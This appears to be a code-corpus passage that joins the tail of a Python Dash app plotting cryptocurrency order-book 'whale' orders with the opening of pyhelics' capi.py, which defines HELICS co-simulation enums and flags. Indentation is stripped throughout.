<= mp), 'colorintensity'].map(str) + ',0)'
timeStamps[combined] = timeStampsGet[combined] # now save timestamp of calc start in timestamp used for title
tables[combined] = final_tbl # save table data
marketPrice[combined] = mp # save market price
depth_ask[combined] = ob_ask
depth_bid[combined] = ob_bid
pair.newData = True
pair.prepare = True # just used for first enabling of send prepare
return True
# begin building the dash itself
app = dash.Dash(__name__)
# app.scripts.append_script({"external_url": js_extern})
# simple layout that can be improved with better CSS/JS later, but it does the job for now
# static_content_before contains all the info we want in our headers that won't be dynamic (for now)
static_content_before = [
html.H2('CRYPTO WHALE WATCHING APP'),
html.H3(html.A('GitHub Link Here (Consider supporting us by giving a star; request new features via "issues" tab)',
href="https://github.com/pmaji/eth_python_tracker")),
html.P([
"Legend: Bright colored mark = likely WHALE ",
"(high volume price point via 1 unique order, or many identical medium-sized orders in a ladder). ", html.Br(),
"Bubbles get darker as the number of unique orders increases. " , html.Br(),
"Hover over bubbles for more info. Note: volume (x-axis) on log-scale. " , html.Br(),
"Click 'Freeze all' button to halt refresh, "
"and hide/show buttons to pick which currency pairs to display. " , html.Br(),
"Only displays orders >= 1% of the volume of the portion of the order book displayed. ", html.Br(),
"If annotations overlap or bubbles cluster, click 'Freeze all' and then zoom in on the area of interest.", html.Br(),
"See GitHub link above for further details.", html.Br()]),
# Create Div to place a conditionally visible loading animation.
html.Div(id="loader", style= {'display': 'block'}, children=[html.Div(className="loader"), html.Div('Hunting Whales...', className='loader-text')]# <-- This is the line that will be changed by the dropdown callback
)
]
cCache = []
for pair in PAIRS:
ticker = pair.ticker
exchange = pair.exchange
graph = 'live-graph-' + exchange + "-" + ticker
cCache.append(html.Br())
cCache.append(html.Div(id=graph))
static_content_after = dcc.Interval(
id='main-interval-component',
interval=clientRefresh * 1000
)
app.layout = html.Div(id='main_container', children=[
html.Div(static_content_before),
html.Div(id='graphs_Container', children=cCache),
html.Div(static_content_after),
])
def prepare_data(ticker, exchange):
combined = exchange + ticker
data = get_data_cache(combined)
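# Note: 'pair' below is not a parameter of this function; it refers to the module-level loop variable left over from building PAIRS above.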
pair.newData = False
base_currency = ticker.split("-")[1]
ob_ask = depth_ask[combined]
ob_bid = depth_bid[combined]
# Get Minimum and Maximum
ladder_Bid_Min = fixNan(shape_bid[combined]['volume'].min())
ladder_Bid_Max = fixNan(shape_bid[combined]['volume'].max(), False)
ladder_Ask_Min = fixNan(shape_ask[combined]['volume'].min())
ladder_Ask_Max = fixNan(shape_ask[combined]['volume'].max(), False)
data_min = fixNan(data[TBL_VOLUME].min())
data_max = fixNan(data[TBL_VOLUME].max(), False)
ob_bid_max = fixNan(ob_bid[TBL_VOLUME].max(), False)
ob_ask_max = fixNan(ob_ask[TBL_VOLUME].max(), False)
symbol = SYMBOLS.get(base_currency.upper(), "")
x_min = min([ladder_Bid_Min, ladder_Ask_Min, data_min])
x_max = max([ladder_Bid_Max, ladder_Ask_Max, data_max, ob_ask_max, ob_bid_max])
max_unique = max([fixNan(shape_bid[combined]['unique'].max(), False),
fixNan(shape_ask[combined]['unique'].max(), False)])
width_factor = 15
if max_unique > 0: width_factor = 15 / max_unique
market_price = marketPrice[combined]
bid_trace = go.Scatter(
x=[], y=[],
text=[],
mode='markers', hoverinfo='text',
marker=dict(opacity=0, color='rgb(0,255,0)'))
ask_trace = go.Scatter(
x=[], y=[],
text=[],
mode='markers', hoverinfo='text',
marker=dict(opacity=0, color='rgb(255,0,0)'))
shape_arr = [dict(
# Line Horizontal
type='line',
x0=x_min * 0.5, y0=market_price,
x1=x_max * 1.5, y1=market_price,
line=dict(color='rgb(0, 0, 0)', width=2, dash='dash')
)]
annot_arr = [dict(
x=log10((x_max*0.9)), y=market_price, xref='x', yref='y',
text=str(market_price) + symbol,
showarrow=True, arrowhead=7, ax=20, ay=0,
bgcolor='rgb(0,0,255)', font={'color': '#ffffff'}
)]
# delete these 10 lines below if we want to move to a JS-based coloring system in the future
shape_arr.append(dict(type='rect',
x0=x_min, y0=market_price,
x1=x_max, y1=market_price * 1.05,
line=dict(color='rgb(255, 0, 0)', width=0.01),
fillcolor='rgba(255, 0, 0, 0.04)'))
shape_arr.append(dict(type='rect',
x0=x_min, y0=market_price,
x1=x_max, y1=market_price * 0.95,
line=dict(color='rgb(0, 255, 0)', width=0.01),
fillcolor='rgba(0, 255, 0, 0.04)'))
for index, row in shape_bid[combined].iterrows():
cWidth = row['unique'] * width_factor
vol = row[TBL_VOLUME]
posY = (row['min_Price'] + row['max_Price']) / 2.0
if cWidth > 15:
cWidth = 15
elif cWidth < 2:
cWidth = 2
shape_arr.append(dict(type='line',
opacity=0.5,
x0=vol, y0=row['min_Price'],
x1=vol, y1=row['max_Price'],
line=dict(color='rgb(0, 255, 0)', width=cWidth)))
bid_trace['x'].append(vol)
bid_trace['y'].append(row['min_Price'])
bid_trace['text'].append(row['text'])
bid_trace['x'].append(vol)
bid_trace['y'].append(posY)
bid_trace['text'].append(row['text'])
bid_trace['x'].append(vol)
bid_trace['y'].append(row['max_Price'])
bid_trace['text'].append(row['text'])
for index, row in shape_ask[combined].iterrows():
cWidth = row['unique'] * width_factor
vol = row[TBL_VOLUME]
posY = (row['min_Price'] + row['max_Price']) / 2.0
if cWidth > 15:
cWidth = 15
elif cWidth < 2:
cWidth = 2
shape_arr.append(dict(type='line',
opacity=0.5,
x0=vol, y0=row['min_Price'],
x1=vol, y1=row['max_Price'],
line=dict(color='rgb(255, 0, 0)', width=cWidth)))
ask_trace['x'].append(vol)
ask_trace['y'].append(row['min_Price'])
ask_trace['text'].append(row['text'])
ask_trace['x'].append(vol)
ask_trace['y'].append(posY)
ask_trace['text'].append(row['text'])
ask_trace['x'].append(vol)
ask_trace['y'].append(row['max_Price'])
ask_trace['text'].append(row['text'])
result = {
'data': [
go.Scatter(
x=data[TBL_VOLUME],
y=data[TBL_PRICE],
mode='markers',
text=data['text'],
opacity=0.95,
hoverinfo='text',
marker={
'size': data['sqrt'],
'line': {'width': 0.5, 'color': 'white'},
'color': data['color']
},
), ask_trace, bid_trace, go.Scatter(
x=ob_ask[TBL_VOLUME],
y=ob_ask[TBL_PRICE],
mode='lines',
opacity=0.5,
hoverinfo='text',
text=ob_ask['text'],
line = dict(color = ('rgb(255, 0, 0)'),
width = 2)
),go.Scatter(
x=ob_bid[TBL_VOLUME],
y=ob_bid[TBL_PRICE],
mode='lines',
opacity=0.5,
hoverinfo='text',
text=ob_bid['text'],
line = dict(color = ('rgb(0, 255, 0)'),
width = 2)
)
],
'layout': go.Layout(
# title automatically updates with refreshed market price
title=("The present market price of {} on {} is: {}{} at {}".format(ticker, exchange, symbol,
str(
marketPrice[combined]),
timeStamps[combined])),
xaxis=dict(title='Order Size', type='log', autotick=True,range=[log10(x_min*0.95), log10(x_max*1.03)]),
yaxis={'title': '{} Price'.format(ticker),'range':[market_price*0.94, market_price*1.06]},
hovermode='closest',
# now code to ensure the sizing is right
margin=go.Margin(
l=75, r=75,
b=50, t=50,
pad=4),
paper_bgcolor='rgba(0,0,0,0)', # set bg to be transparent, works with themes.
plot_bgcolor='rgba(0,0,0,0)', # set bg to be transparent, works with themes.
# adding the horizontal reference line at market price
shapes=shape_arr,
annotations=annot_arr,
showlegend=False
)
}
return result
def prepare_send():
lCache = []
cData = get_All_data()
for pair in PAIRS:
ticker = pair.ticker
exchange = pair.exchange
graph = 'live-graph-' + exchange + "-" + ticker
lCache.append(html.Br())
if (pair.Dataprepared):
lCache.append(dcc.Graph(
className='plot',
id=graph,
figure=cData[exchange + ticker]
))
else:
lCache.append(html.Div(className='plot', id=graph))
return lCache
# links up the chart creation to the interval for an auto-refresh
# creates one callback per currency pairing; easy to replicate / add new pairs
@app.callback(Output('graphs_Container', 'children'),
events=[Event('main-interval-component', 'interval')])
def update_Site_data():
return getSendCache()
# round_sig rounds x to 'sig' significant figures; 'overwrite' > 0 forces that fixed number of decimals, and 'minimum' sets the fewest decimal places used.
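# Illustrative examples (not from the original source): round_sig(0.004567) -> 0.00457 (3 significant figures);
# round_sig(1234.5678, 3, 0, 2) -> 1234.57 (the sig-fig rule would give fewer decimals, so 'minimum'=2 applies).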
def round_sig(x, sig=3, overwrite=0, minimum=0):
if (x == 0):
return 0.0
elif overwrite > 0:
return round(x, overwrite)
else:
digits = -int(floor(log10(abs(x)))) + (sig - 1)
if digits <= minimum:
return round(x, minimum)
else:
return round(x, digits)
# calcColor maps the number of unique orders at a price point to a colour intensity (fewer orders -> brighter), clamped to the range [30, 255].
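# Illustrative examples (not from the original source): calcColor(1) -> 255 (brightest), calcColor(50) -> 30 (400/50 = 8, clamped up to 30).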
def calcColor(x):
response = round(400 / x)
if response > 255:
response = 255
elif response < 30:
response = 30
return response
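# fixNan replaces NaN so min()/max() comparisons stay well defined: e.g. fixNan(float('nan')) -> 99999 when hunting minimums, fixNan(float('nan'), False) -> 0 when hunting maximums.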
def fixNan(x, pMin=True):
if isnan(x):
if pMin:
return 99999
else:
return 0
else:
return x
def getStamp():
return int(round(time.time() * 1000))
# watchdog to catch any instances where refresh stops
def watchdog():
global PAIRS
tServer = threading.Thread(target=serverThread)
tServer.daemon = False
tServer.start()
time.sleep(3) # get Server start
log(2,"Server should be running now")
tPreparer = threading.Thread(target=sendPrepareThread)
tPreparer.daemon = False
tPreparer.start()
for pair in PAIRS:
pair.threadWebsocket = threading.Thread(
target=websockThread, args=(pair,))
pair.threadWebsocket.daemon = False
pair.threadWebsocket.start()
time.sleep(3)
log(2,"Web sockets up")
for pair in PAIRS:
pair.threadRecalc = threading.Thread(target=recalcThread, args=(pair,))
pair.threadRecalc.daemon = False
pair.threadRecalc.start()
time.sleep(2.5)
log(2,"ReCalc up")
for pair in PAIRS:
pair.threadPrepare = threading.Thread(
target=preparePairThread, args=(pair,))
pair.threadPrepare.daemon = False
pair.threadPrepare.start()
log(2,"Everything should be running now, starting Watchdog, to control the herd")
while True:
time.sleep(2)
alive = True
for pair in PAIRS:
if not pair.threadRecalc.is_alive():
alive = False
log(2,"Restarting pair Recalc " +
pair.exchange + " " + pair.ticker)
pair.threadRecalc = threading.Thread(
target=recalcThread, args=(pair,))
pair.threadRecalc.daemon = False
pair.threadRecalc.start()
if not pair.threadWebsocket.is_alive():
alive = False
log(2,"Restarting pair Web socket " +
pair.exchange + " " + pair.ticker)
pair.webSocketKill = 1
pair.threadWebsocket = threading.Thread(
target=websockThread, args=(pair,))
pair.threadWebsocket.daemon = False
pair.threadWebsocket.start()
if not pair.threadPrepare.is_alive():
alive = False
log(2,"Restarting pair Prepare worker " +
pair.exchange + " " + pair.ticker)
pair.threadPrepare = threading.Thread(
target=preparePairThread, args=(pair,))
pair.threadPrepare.daemon = False
pair.threadPrepare.start()
if not tServer.is_alive():
alive = False
log(3,"Watchdog detected dead Server, restarting")
tServer = threading.Thread(target=serverThread)
tServer.daemon = False
tServer.start()
if not tPreparer.is_alive():
alive = False
log(3,"Watchdog detected dead Preparer, restarting")
tPreparer = threading.Thread(target=sendPrepareThread)
tPreparer.daemon = False
tPreparer.start()
if not alive:
log(3,"Watchdog got some bad sheeps back to group")
def serverThread():
app.run_server(host='0.0.0.0', port=serverPort)
def sendPrepareThread():
global sendCache, first_prepare, overallNewData
while True:
sendCache = prepare_send()
overallNewData = False
time.sleep(0.5)
while not overallNewData:
time.sleep(0.5)
def recalcThread(pair):
count = 0
refreshes = 0
while True:
if (pair.websocket):
dif = getStamp() - pair.lastStamp
if dif > desiredPairRefresh:
log(1,"Ms Diff for " + pair.ticker + " is " + str(
dif) + " Total refreshes for pair " + str(refreshes))
refreshes += 1
if not calc_data(pair):
count = count + 1
else:
count = 0
pair.lastStamp = pair.usedStamp
if count > 5:
log(3,"Going to kill Web socket from " + pair.ticker)
count = -5
pair.webSocketKill = 0
else:
time.sleep((desiredPairRefresh - dif) / 1000)
def websockThread(pair):
pair.websocket = False
pair.ob_Inst = GDaxBook(pair.ticker)
time.sleep(5)
pair.websocket = True
while True:
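# Intentional: when recalcThread sets webSocketKill to 0 (after repeated failures), the division below raises ZeroDivisionError, ending this thread so the watchdog restarts the web socket.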
kill = 5 / pair.webSocketKill
time.sleep(4)
def preparePairThread(pair):
global prepared, overallNewData
ticker = pair.ticker
exc = pair.exchange
cbn = exc + ticker
while True:
if (pair.prepare):
prepared[cbn] = prepare_data(ticker, exc)
overallNewData = True
pair.Dataprepared = True
while not pair.newData:
time.sleep(0.2)
def handleArgs(argv):
global serverPort, debugLevel, desiredPairRefresh
try:
opts, args = getopt.getopt(
argv, "hp:d:", ["port=","debug=","pRefresh="])
except getopt.GetoptError:
print('app.py -h')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('app.py --port 8050 --pRefresh')
print('--pRefresh indicates the refresh Rate in ms')
sys.exit()
elif opt in ("-p", "--port"):
serverPort = int(arg)
elif opt in ("-d", "--debug"):
debugLevel = int(arg)
elif opt in ("--pRefresh"):
desiredPairRefresh = int(arg)
log(4,"Legend: This is an error message")
log(3,"Legend: This is a warning message")
log(2,"Legend: This is an info message")
log(1,"Legend: This is a debug message")
log(0,"Legend: This is a deep debug message")
log(1,'Web Interface Port is ' + str(serverPort))
log(1,'Debug Level is ' + str(debugLevel))
if __name__ == '__main__':
# Initial Load of Data
handleArgs(sys.argv[1:])
watchdog()
|
capi.py
|
# -*- coding: utf-8 -*-
import logging
import warnings
import json
import weakref
import os
from enum import IntEnum, unique
try:
from typing import Dict, List, Tuple, Union, Any
JSONType = Union[
Dict[str, Any],
List[dict],
]
except ImportError:
pass
from . import _build
lib = _build.lib
ffi = _build.ffi
PYHELICS_CLEANUP = os.environ.get("PYHELICS_CLEANUP", False)
if ffi.string(lib.helicsGetVersion()).decode().startswith("2."):
HELICS_VERSION = 2
else:
HELICS_VERSION = 3
HELICS_TIME_ZERO = 0.0 # definition of time zero-the beginning of simulation
HELICS_TIME_EPSILON = 1.0e-9 # definition of the minimum time resolution
HELICS_TIME_INVALID = -1.785e39 # definition of an invalid time that has no meaning
HELICS_TIME_MAXTIME = 9223372036.854774  # definition of the maximum allowable time
helics_time_zero = HELICS_TIME_ZERO
helics_time_epsilon = HELICS_TIME_EPSILON
helics_time_invalid = HELICS_TIME_INVALID
helics_time_maxtime = HELICS_TIME_MAXTIME
HelicsTime = float
pointer = int
@unique
class HelicsSequencingMode(IntEnum):
"""
Enumeration of sequencing modes for queries
fast is the default, meaning the query travels along priority channels and takes precedence over
existing messages; ordered means it follows normal priority patterns and will be ordered along with
existing messages
- **FAST**
- **ORDERED**
- **DEFAULT**
"""
FAST = 0
ORDERED = 1
DEFAULT = 2
HELICS_SEQUENCING_MODE_FAST = HelicsSequencingMode.FAST
HELICS_SEQUENCING_MODE_ORDERED = HelicsSequencingMode.ORDERED
HELICS_SEQUENCING_MODE_DEFAULT = HelicsSequencingMode.DEFAULT
helics_sequencing_mode_fast = HelicsSequencingMode.FAST
helics_sequencing_mode_ordered = HelicsSequencingMode.ORDERED
helics_sequencing_mode_default = HelicsSequencingMode.DEFAULT
@unique
class HelicsCoreType(IntEnum):
"""
- **DEFAULT**
- **ZMQ**
- **MPI**
- **TEST**
- **INTERPROCESS**
- **IPC**
- **TCP**
- **UDP**
- **NNG**
- **ZMQ_TEST**
- **TCP_SS**
- **HTTP**
- **WEBSOCKET**
- **INPROC**
- **NULL**
"""
DEFAULT = 0 # HelicsCoreType
ZMQ = 1 # HelicsCoreType
MPI = 2 # HelicsCoreType
TEST = 3 # HelicsCoreType
INTERPROCESS = 4 # HelicsCoreType
IPC = 5 # HelicsCoreType
TCP = 6 # HelicsCoreType
UDP = 7 # HelicsCoreType
NNG = 9 # HelicsCoreType
ZMQ_TEST = 10 # HelicsCoreType
TCP_SS = 11 # HelicsCoreType
HTTP = 12 # HelicsCoreType
WEBSOCKET = 14 # HelicsCoreType
INPROC = 18 # HelicsCoreType
NULL = 66 # HelicsCoreType
HELICS_CORE_TYPE_DEFAULT = HelicsCoreType.DEFAULT
HELICS_CORE_TYPE_ZMQ = HelicsCoreType.ZMQ
HELICS_CORE_TYPE_MPI = HelicsCoreType.MPI
HELICS_CORE_TYPE_TEST = HelicsCoreType.TEST
HELICS_CORE_TYPE_INTERPROCESS = HelicsCoreType.INTERPROCESS
HELICS_CORE_TYPE_IPC = HelicsCoreType.IPC
HELICS_CORE_TYPE_TCP = HelicsCoreType.TCP
HELICS_CORE_TYPE_UDP = HelicsCoreType.UDP
HELICS_CORE_TYPE_ZMQ_TEST = HelicsCoreType.ZMQ_TEST
HELICS_CORE_TYPE_NNG = HelicsCoreType.NNG
HELICS_CORE_TYPE_TCP_SS = HelicsCoreType.TCP_SS
HELICS_CORE_TYPE_HTTP = HelicsCoreType.HTTP
HELICS_CORE_TYPE_WEBSOCKET = HelicsCoreType.WEBSOCKET
HELICS_CORE_TYPE_INPROC = HelicsCoreType.INPROC
HELICS_CORE_TYPE_NULL = HelicsCoreType.NULL
helics_core_type_default = HelicsCoreType.DEFAULT
helics_core_type_zmq = HelicsCoreType.ZMQ
helics_core_type_mpi = HelicsCoreType.MPI
helics_core_type_test = HelicsCoreType.TEST
helics_core_type_interprocess = HelicsCoreType.INTERPROCESS
helics_core_type_ipc = HelicsCoreType.IPC
helics_core_type_tcp = HelicsCoreType.TCP
helics_core_type_udp = HelicsCoreType.UDP
helics_core_type_zmq_test = HelicsCoreType.ZMQ_TEST
helics_core_type_nng = HelicsCoreType.NNG
helics_core_type_tcp_ss = HelicsCoreType.TCP_SS
helics_core_type_http = HelicsCoreType.HTTP
helics_core_type_websocket = HelicsCoreType.WEBSOCKET
helics_core_type_inproc = HelicsCoreType.INPROC
helics_core_type_null = HelicsCoreType.NULL
@unique
class HelicsDataType(IntEnum):
"""
- **STRING**
- **DOUBLE**
- **INT**
- **COMPLEX**
- **VECTOR**
- **COMPLEX_VECTOR**
- **NAMED_POINT**
- **BOOLEAN**
- **TIME**
- **RAW**
- **JSON**
- **MULTI**
- **ANY**
"""
STRING = 0 # HelicsDataType
DOUBLE = 1 # HelicsDataType
INT = 2 # HelicsDataType
COMPLEX = 3 # HelicsDataType
VECTOR = 4 # HelicsDataType
COMPLEX_VECTOR = 5 # HelicsDataType
NAMED_POINT = 6 # HelicsDataType
BOOLEAN = 7 # HelicsDataType
TIME = 8 # HelicsDataType
RAW = 25 # HelicsDataType
JSON = 30 # HelicsDataType
MULTI = 33 # HelicsDataType
ANY = 25262 # HelicsDataType
HELICS_DATA_TYPE_STRING = HelicsDataType.STRING
HELICS_DATA_TYPE_CHAR = HelicsDataType.STRING
HELICS_DATA_TYPE_DOUBLE = HelicsDataType.DOUBLE
HELICS_DATA_TYPE_INT = HelicsDataType.INT
HELICS_DATA_TYPE_COMPLEX = HelicsDataType.COMPLEX
HELICS_DATA_TYPE_VECTOR = HelicsDataType.VECTOR
HELICS_DATA_TYPE_COMPLEX_VECTOR = HelicsDataType.COMPLEX_VECTOR
HELICS_DATA_TYPE_NAMED_POINT = HelicsDataType.NAMED_POINT
HELICS_DATA_TYPE_BOOLEAN = HelicsDataType.BOOLEAN
HELICS_DATA_TYPE_TIME = HelicsDataType.TIME
HELICS_DATA_TYPE_RAW = HelicsDataType.RAW
HELICS_DATA_TYPE_JSON = HelicsDataType.JSON
HELICS_DATA_TYPE_MULTI = HelicsDataType.MULTI
HELICS_DATA_TYPE_ANY = HelicsDataType.ANY
helics_data_type_string = HelicsDataType.STRING
helics_data_type_char = HelicsDataType.STRING
helics_data_type_double = HelicsDataType.DOUBLE
helics_data_type_int = HelicsDataType.INT
helics_data_type_complex = HelicsDataType.COMPLEX
helics_data_type_vector = HelicsDataType.VECTOR
helics_data_type_complex_vector = HelicsDataType.COMPLEX_VECTOR
helics_data_type_named_point = HelicsDataType.NAMED_POINT
helics_data_type_boolean = HelicsDataType.BOOLEAN
helics_data_type_time = HelicsDataType.TIME
helics_data_type_raw = HelicsDataType.RAW
helics_data_type_json = HelicsDataType.JSON
helics_data_type_multi = HelicsDataType.MULTI
helics_data_type_any = HelicsDataType.ANY
# enumeration of general flags that can be used in federates/cores/brokers
@unique
class HelicsFlag(IntEnum):
    # flag specifying that a federate, core, or broker may be slow to respond to pings. If the federate goes offline there is no good way to detect it, so use with caution
SLOW_RESPONDING = 29
    # flag specifying the federate/core/broker is operating in a user debug mode, so deadlock timers and timeouts are disabled; this flag is a combination of slow_responding and disabling of some timeouts
DEBUGGING = 31
# specify that a federate error should terminate the federation
TERMINATE_ON_ERROR = 72
# specify that the log files should be flushed on every log message
FORCE_LOGGING_FLUSH = 88
# specify that a full log should be dumped into a file
DUMPLOG = 89
# specify that helics should capture profiling data
PROFILING = 93
# flag trigger for generating a profiling marker
PROFILING_MARKER = 95
HELICS_FLAG_SLOW_RESPONDING = HelicsFlag.SLOW_RESPONDING
HELICS_FLAG_DEBUGGING = HelicsFlag.DEBUGGING
HELICS_FLAG_TERMINATE_ON_ERROR = HelicsFlag.TERMINATE_ON_ERROR
HELICS_FLAG_FORCE_LOGGING_FLUSH = HelicsFlag.FORCE_LOGGING_FLUSH
HELICS_FLAG_DUMPLOG = HelicsFlag.DUMPLOG
HELICS_FLAG_PROFILING = HelicsFlag.PROFILING
HELICS_FLAG_PROFILING_MARKER = HelicsFlag.PROFILING_MARKER
helics_flag_slow_responding = HelicsFlag.SLOW_RESPONDING
helics_flag_debugging = HelicsFlag.DEBUGGING
helics_flag_terminate_on_error = HelicsFlag.TERMINATE_ON_ERROR
helics_flag_force_logging_flush = HelicsFlag.FORCE_LOGGING_FLUSH
helics_flag_dumplog = HelicsFlag.DUMPLOG
helics_flag_profiling = HelicsFlag.PROFILING
helics_flag_profiling_marker = HelicsFlag.PROFILING_MARKER
@unique
class HelicsFederateFlag(IntEnum):
"""
- **OBSERVER**
- **UNINTERRUPTIBLE**
- **INTERRUPTIBLE**
- **SOURCE_ONLY**
- **ONLY_TRANSMIT_ON_CHANGE**
- **ONLY_UPDATE_ON_CHANGE**
- **WAIT_FOR_CURRENT_TIME_UPDATE**
- **RESTRICTIVE_TIME_POLICY**
- **ROLLBACK**
- **FORWARD_COMPUTE**
- **REALTIME**
- **SINGLE_THREAD_FEDERATE**
- **IGNORE_TIME_MISMATCH_WARNINGS**
- **STRICT_CONFIG_CHECKING**
- **USE_JSON_SERIALIZATION**
- **EVENT_TRIGGERED**
- **LOCAL_PROFILING_CAPTURE**
"""
# flag indicating that a federate is observe only
OBSERVER = 0
# flag indicating that a federate can only return requested times
UNINTERRUPTIBLE = 1
# flag indicating that a federate can be interrupted
INTERRUPTIBLE = 2
# flag indicating that a federate/interface is a signal generator only
SOURCE_ONLY = 4
# flag indicating a federate/interface should only transmit values if they have changed (binary equivalence)
ONLY_TRANSMIT_ON_CHANGE = 6
# flag indicating a federate/interface should only trigger an update if a value has changed (binary equivalence)
ONLY_UPDATE_ON_CHANGE = 8
# flag indicating a federate should only grant time if all other federates have already passed the requested time
WAIT_FOR_CURRENT_TIME_UPDATE = 10
# flag indicating a federate should operate on a restrictive time policy, which disallows some 2nd order time evaluation and can be useful for certain types of dependency cycles and update patterns, but generally shouldn't be used as it can lead to some very slow update conditions
RESTRICTIVE_TIME_POLICY = 11
# flag indicating that a federate has rollback capability
ROLLBACK = 12
# flag indicating that a federate performs forward computation and does internal rollback
FORWARD_COMPUTE = 14
# flag indicating that a federate needs to run in real time
REALTIME = 16
# flag indicating that the federate will only interact on a single thread
SINGLE_THREAD_FEDERATE = 27
# used to not display warnings on mismatched requested times
IGNORE_TIME_MISMATCH_WARNINGS = 67
    # specify that checking on configuration files should be strict and throw an error on any invalid values
STRICT_CONFIG_CHECKING = 75
# specify that the federate should use json serialization for all data types
USE_JSON_SERIALIZATION = 79
    # specify that the federate is event triggered, meaning (all/most) events are triggered by incoming events
EVENT_TRIGGERED = 81
    # specify that the federate should capture the profiling data to the local federate logging system
LOCAL_PROFILING_CAPTURE = 96
HELICS_FLAG_OBSERVER = HelicsFederateFlag.OBSERVER
HELICS_FLAG_UNINTERRUPTIBLE = HelicsFederateFlag.UNINTERRUPTIBLE
HELICS_FLAG_INTERRUPTIBLE = HelicsFederateFlag.INTERRUPTIBLE
HELICS_FLAG_SOURCE_ONLY = HelicsFederateFlag.SOURCE_ONLY
HELICS_FLAG_ONLY_TRANSMIT_ON_CHANGE = HelicsFederateFlag.ONLY_TRANSMIT_ON_CHANGE
HELICS_FLAG_ONLY_UPDATE_ON_CHANGE = HelicsFederateFlag.ONLY_UPDATE_ON_CHANGE
HELICS_FLAG_WAIT_FOR_CURRENT_TIME_UPDATE = HelicsFederateFlag.WAIT_FOR_CURRENT_TIME_UPDATE
HELICS_FLAG_RESTRICTIVE_TIME_POLICY = HelicsFederateFlag.RESTRICTIVE_TIME_POLICY
HELICS_FLAG_ROLLBACK = HelicsFederateFlag.ROLLBACK
HELICS_FLAG_FORWARD_COMPUTE = HelicsFederateFlag.FORWARD_COMPUTE
HELICS_FLAG_REALTIME = HelicsFederateFlag.REALTIME
HELICS_FLAG_SINGLE_THREAD_FEDERATE = HelicsFederateFlag.SINGLE_THREAD_FEDERATE
HELICS_FLAG_IGNORE_TIME_MISMATCH_WARNINGS = HelicsFederateFlag.IGNORE_TIME_MISMATCH_WARNINGS
HELICS_FLAG_STRICT_CONFIG_CHECKING = HelicsFederateFlag.STRICT_CONFIG_CHECKING
HELICS_FLAG_USE_JSON_SERIALIZATION = HelicsFederateFlag.USE_JSON_SERIALIZATION
HELICS_FLAG_EVENT_TRIGGERED = HelicsFederateFlag.EVENT_TRIGGERED
HELICS_FLAG_LOCAL_PROFILING_CAPTURE = HelicsFederateFlag.LOCAL_PROFILING_CAPTURE
helics_flag_observer = HelicsFederateFlag.OBSERVER
helics_flag_uninterruptible = HelicsFederateFlag.UNINTERRUPTIBLE
helics_flag_interruptible = HelicsFederateFlag.INTERRUPTIBLE
helics_flag_source_only = HelicsFederateFlag.SOURCE_ONLY
helics_flag_only_transmit_on_change = HelicsFederateFlag.ONLY_TRANSMIT_ON_CHANGE
helics_flag_only_update_on_change = HelicsFederateFlag.ONLY_UPDATE_ON_CHANGE
helics_flag_wait_for_current_time_update = HelicsFederateFlag.WAIT_FOR_CURRENT_TIME_UPDATE
helics_flag_restrictive_time_policy = HelicsFederateFlag.RESTRICTIVE_TIME_POLICY
helics_flag_rollback = HelicsFederateFlag.ROLLBACK
helics_flag_forward_compute = HelicsFederateFlag.FORWARD_COMPUTE
helics_flag_realtime = HelicsFederateFlag.REALTIME
helics_flag_single_thread_federate = HelicsFederateFlag.SINGLE_THREAD_FEDERATE
helics_flag_ignore_time_mismatch_warnings = HelicsFederateFlag.IGNORE_TIME_MISMATCH_WARNINGS
helics_flag_strict_config_checking = HelicsFederateFlag.STRICT_CONFIG_CHECKING
helics_flag_use_json_serialization = HelicsFederateFlag.USE_JSON_SERIALIZATION
helics_flag_event_triggered = HelicsFederateFlag.EVENT_TRIGGERED
helics_flag_local_profiling_capture = HelicsFederateFlag.LOCAL_PROFILING_CAPTURE
class HelicsCoreFlag(IntEnum):
# used to delay a core from entering initialization mode even if it would otherwise be ready
DELAY_INIT_ENTRY = 45
# used to clear the HELICS_DELAY_INIT_ENTRY flag in cores
ENABLE_INIT_ENTRY = 47
IGNORE = 999
HELICS_FLAG_DELAY_INIT_ENTRY = HelicsCoreFlag.DELAY_INIT_ENTRY
HELICS_FLAG_ENABLE_INIT_ENTRY = HelicsCoreFlag.ENABLE_INIT_ENTRY
helics_flag_delay_init_entry = HelicsCoreFlag.DELAY_INIT_ENTRY
helics_flag_enable_init_entry = HelicsCoreFlag.ENABLE_INIT_ENTRY
if HELICS_VERSION == 2:
@unique
class HelicsLogLevel(IntEnum):
"""
- **NO_PRINT**
- **ERROR**
- **WARNING**
- **SUMMARY**
- **CONNECTIONS**
- **INTERFACES**
- **TIMING**
- **DATA**
        - **DEBUG**
"""
DUMPLOG = -10 # HelicsLogLevels
NO_PRINT = -1 # HelicsLogLevels
ERROR = 0 # HelicsLogLevels
WARNING = 1 # HelicsLogLevels
SUMMARY = 2 # HelicsLogLevels
CONNECTIONS = 3 # HelicsLogLevels
INTERFACES = 4 # HelicsLogLevels
TIMING = 5 # HelicsLogLevels
DATA = 6 # HelicsLogLevels
DEBUG = 7 # HelicsLogLevels
else:
@unique
class HelicsLogLevel(IntEnum):
"""
- **NO_PRINT**
- **ERROR**
- **WARNING**
- **SUMMARY**
- **CONNECTIONS**
- **INTERFACES**
- **TIMING**
- **DATA**
- **DEBUG**
- **TRACE**
"""
DUMPLOG = -10 # HelicsLogLevels
NO_PRINT = -4 # HelicsLogLevels
ERROR = 0 # HelicsLogLevels
PROFILING = 2 # HelicsLogLevels
WARNING = 3 # HelicsLogLevels
SUMMARY = 6 # HelicsLogLevels
CONNECTIONS = 9 # HelicsLogLevels
INTERFACES = 12 # HelicsLogLevels
TIMING = 15 # HelicsLogLevels
DATA = 18 # HelicsLogLevels
DEBUG = 21 # HelicsLogLevels
TRACE = 24 # HelicsLogLevels
try:
HELICS_LOG_LEVEL_DUMPLOG = HelicsLogLevel.DUMPLOG
except AttributeError:
pass
HELICS_LOG_LEVEL_NO_PRINT = HelicsLogLevel.NO_PRINT
HELICS_LOG_LEVEL_ERROR = HelicsLogLevel.ERROR
try:
HELICS_LOG_LEVEL_PROFILING = HelicsLogLevel.PROFILING
except AttributeError:
pass
HELICS_LOG_LEVEL_WARNING = HelicsLogLevel.WARNING
HELICS_LOG_LEVEL_SUMMARY = HelicsLogLevel.SUMMARY
HELICS_LOG_LEVEL_CONNECTIONS = HelicsLogLevel.CONNECTIONS
HELICS_LOG_LEVEL_INTERFACES = HelicsLogLevel.INTERFACES
HELICS_LOG_LEVEL_TIMING = HelicsLogLevel.TIMING
HELICS_LOG_LEVEL_DATA = HelicsLogLevel.DATA
